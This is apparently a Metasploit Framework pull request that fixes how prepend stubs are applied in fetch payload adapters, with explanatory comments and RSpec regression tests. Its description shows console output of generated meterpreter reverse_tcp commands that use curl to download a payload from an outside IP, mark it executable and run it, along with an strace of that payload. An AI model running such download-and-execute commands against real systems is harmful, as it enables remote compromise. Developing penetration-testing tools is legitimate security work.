### PR TITLE
Fix Apply Prepends in Fetch Payloads

### DIFF
--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -120,7 +120,7 @@ module Msf::Payload::Adapter::Fetch
         add_srv_entry(srvuri, 'x', opts)
       else
         opts[:dynamic_arch] = false
-        opts[:code] = super(opts)
+        opts[:code] = apply_prepends(super(opts))
         add_srv_entry(srvuri, generate_payload_exe(opts), opts)
       end
 
@@ -136,8 +136,12 @@ module Msf::Payload::Adapter::Fetch
       vprint_status("Command to execute on target: #{cmd}")
       cmd
     else
-      super(opts)
+      apply_prepends(super(opts))
     end
+  end
+
+  def generate_complete
+    generate
   end
 
   # Dispatches command generation to the selected FETCH_COMMAND helper.

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -106,6 +106,16 @@ module Msf::Payload::Adapter::Fetch
     Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
   end
 
+  # Unlike a normal payload, #generate here does not return raw payload bytes —
+  # it returns the fetch-and-execute shell command (curl/wget/etc.) to run on
+  # the target, staging the actual served payload binary as a side effect via
+  # #add_srv_entry. Because of that, prepend stubs (PrependFork,
+  # PrependSetuid, etc.) can't be applied at the #generate_complete layer the
+  # way other payload types do — that would run apply_prepends over the shell
+  # command string instead of the binary, corrupting it. Instead,
+  # apply_prepends is called at the two points below where the served
+  # payload's raw bytes actually get assembled, before they're handed to
+  # generate_payload_exe/add_srv_entry. See #generate_complete.
   def generate(opts = {})
     if opts[:dynamic_arch].nil?
       @srv_resources = []
@@ -140,6 +150,10 @@ module Msf::Payload::Adapter::Fetch
     end
   end
 
+  # Intentionally not the inherited `apply_prepends(generate)`: prepends are
+  # already baked into the served payload bytes inside #generate, so
+  # reapplying apply_prepends here would double them up on the binary (or run
+  # them over the returned shell command, which isn't payload bytes at all).
   def generate_complete
     generate
   end

--- a/spec/lib/msf/core/payload/adapter/fetch_spec.rb
+++ b/spec/lib/msf/core/payload/adapter/fetch_spec.rb
@@ -69,4 +69,96 @@ RSpec.describe Msf::Payload::Adapter::Fetch do
   describe '#_generate_wget_command' do
     include_examples 'a dynamic-arch aware fetch command', :_generate_wget_command
   end
+
+  # Regression coverage for the bug fixed by "apply prepends properly in fetch
+  # payloads": #generate_complete used to be the inherited
+  # `apply_prepends(generate)`, which ran apply_prepends a *second* time over
+  # the fetch/wget/curl shell command string returned by #generate (mangling
+  # it), while the served payload binary itself never got its prepend stub
+  # applied at all. The fix bakes apply_prepends into the two #generate call
+  # sites that build the actual payload bytes, and makes #generate_complete a
+  # plain passthrough to #generate.
+  describe '#generate and #generate_complete' do
+    let(:raw_generator) do
+      Module.new do
+        # Stands in for the underlying stager/stage #generate that Fetch's
+        # #generate calls via `super`.
+        def generate(_opts = {})
+          'RAWBYTES'
+        end
+
+        # Stands in for the real Windows/Linux::Prepends#apply_prepends that
+        # Fetch's #generate calls via `apply_prepends`.
+        def apply_prepends(raw)
+          "PREPENDED[#{raw}]"
+        end
+      end
+    end
+
+    let(:generate_harness_class) do
+      Class.new do
+        def initialize
+          @datastore = { 'FETCH_PIPE' => false }
+        end
+
+        attr_reader :datastore, :srv_resources
+
+        def module_info
+          { 'AdaptedArch' => 'x86', 'AdaptedPlatform' => 'linux' }
+        end
+
+        def srvuri
+          'test_uri'
+        end
+
+        def generate_payload_exe(opts)
+          opts[:code]
+        end
+
+        def generate_fetch_commands(uri:, dynamic_arch:)
+          "CMD(uri=#{uri},dynamic_arch=#{dynamic_arch})"
+        end
+
+        def vprint_status(_msg); end
+      end
+    end
+
+    subject(:harness) do
+      generate_harness_class.include(raw_generator).include(Msf::Payload::Adapter::Fetch).new
+    end
+
+    describe '#generate' do
+      context 'when generating the initial payload (opts[:dynamic_arch] is nil)' do
+        it 'applies prepends to the payload bytes before serving them, not to the returned command' do
+          cmd = harness.generate
+
+          expect(harness.srv_resources.last[:data]).to eq('PREPENDED[RAWBYTES]')
+          expect(cmd).to eq('CMD(uri=test_uri,dynamic_arch=false)')
+        end
+      end
+
+      context 'when generating the arch-resolved payload for an on-demand dynamic-arch request' do
+        it 'applies prepends to the resolved payload bytes' do
+          result = harness.generate(dynamic_arch: true, arch: 'mipsle')
+
+          expect(result).to eq('PREPENDED[RAWBYTES]')
+        end
+      end
+    end
+
+    describe '#generate_complete' do
+      it 'delegates to #generate without applying prepends a second time' do
+        call_count = 0
+        allow(harness).to receive(:apply_prepends) do |raw|
+          call_count += 1
+          "PREPENDED[#{raw}]"
+        end
+
+        result = harness.generate_complete
+
+        expect(call_count).to eq(1)
+        expect(result).to eq('CMD(uri=test_uri,dynamic_arch=false)')
+      end
+    end
+  end
 end


### PR DESCRIPTION
fixes: https://github.com/rapid7/metasploit-framework/issues/21803

## Before
```
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
curl -s http://100.124.46.196:8080/Oo_DnDIU5dqaVMMTW1AxXQ%7Csh
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set PrependFork true
PrependFork => true
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
j9XH��H1�j<Xpj9XH��u�curl -s http://100.124.46.196:8080/Oo_DnDIU5dqaVMMTW1AxXQ%7Csh
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
```

## After
```
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
curl -so ./BmeESovTlTw http://100.124.46.196:8080/Peslj03-ZQfSqcXGAvlH-A;chmod +x ./BmeESovTlTw;./BmeESovTlTw&
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set PrependFork 
PrependFork => false
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set PrependFork true
PrependFork => true
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
curl -so ./BmeESovTlTw http://100.124.46.196:8080/Peslj03-ZQfSqcXGAvlH-A;chmod +x ./BmeESovTlTw;./BmeESovTlTw&
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler 
```

```
┌──(kali㉿kali)-[~/Public]
└─$ strace ./BmeESovTlTw 
execve("./BmeESovTlTw", ["./BmeESovTlTw"], 0xffffc230d460 /* 57 vars */) = 0
brk(NULL)                               = 0xaaaab4c7b000
...
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xaaaab4c7b0f0) = 217828
rt_sigprocmask(SIG_SETMASK, ~[KILL STOP RTMIN RT_1], NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=217828, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], NULL, 8) = 0
exit_group(0)                           = ?
+++ exited with 0 +++
```